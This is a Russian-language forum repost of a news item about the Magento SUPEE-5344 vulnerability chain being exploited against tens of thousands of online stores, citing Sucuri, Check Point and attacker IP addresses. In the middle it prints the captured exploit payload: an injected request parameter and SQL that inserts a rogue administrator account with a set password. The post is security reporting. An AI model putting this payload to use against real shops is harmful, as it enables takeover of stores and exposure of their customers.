Уязвимость в CMS Magento: пострадали 98 000 интернет-магазинов

  • Автор темы Eva
  • Дата начала

Eva

Местный
Регистрация
3/4/15
Сообщения
866
Репутация
0
Реакции
1.778
RUB
0
Злоумышленники уже начали эксплуатировать исключительно опасную уязвимость SUPEE-5344, которая присутствует почти в 100 000 интернет-магазинах, работающих на системе управления контентом .

Magento считается самой популярной CMS для интернет-магазинов. Разработчики выпустили ещё в феврале, но до сих пор большое количество торговых площадок не установили его, как это часто бывает. Многие владельцы магазинов просто не знают, что подвергают опасности и себя, и своих пользователей.

О проблеме голландский хостер Byte, который размещает много сайтов на платформе Magento. Они уже наблюдали использование эксплоита для Magento версий Community и Enterprise.

Информацию коллеги из Sucuri. Они говорят, что обнаруженный ими эксплоит осуществляет только одну функцию: создаёт фальшивый админский аккаунт в базе данных Magento.



popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);

SET @SALT = “rp”;

SET @PASS = CONCAT(MD5(CONCAT( @SALT , ‘123’) ), CONCAT(‘:’, @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;

INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES (‘Firstname’,’Lastname’,”[email protected]”,’ypwq‘,@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());

INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,’U’,(SELECT user_id FROM admin_user WHERE username = ‘ypwq’),’Firstname’); –


«Уязвимость на самом деле состоит из цепочки нескольких уязвимостей, которые в итоге позволяют неавторизованному пользователю запустить PHP-код на сервере», — Нетанель Рубин (Netanel Rubin) из компании Check Point. В частности, используются уязвимости CVE-2015-1397, CVE-2015-1398 и CVE-2015-1399. На сопровождающем специалисты Check Point показывают, как заказать дорогие наручные часы, используя SUPEE-5344.

По , атаки начались в понедельник с IP-адресов 62.76.177.179 и 185.22.232.218 (оба российские).
 
Сверху Снизу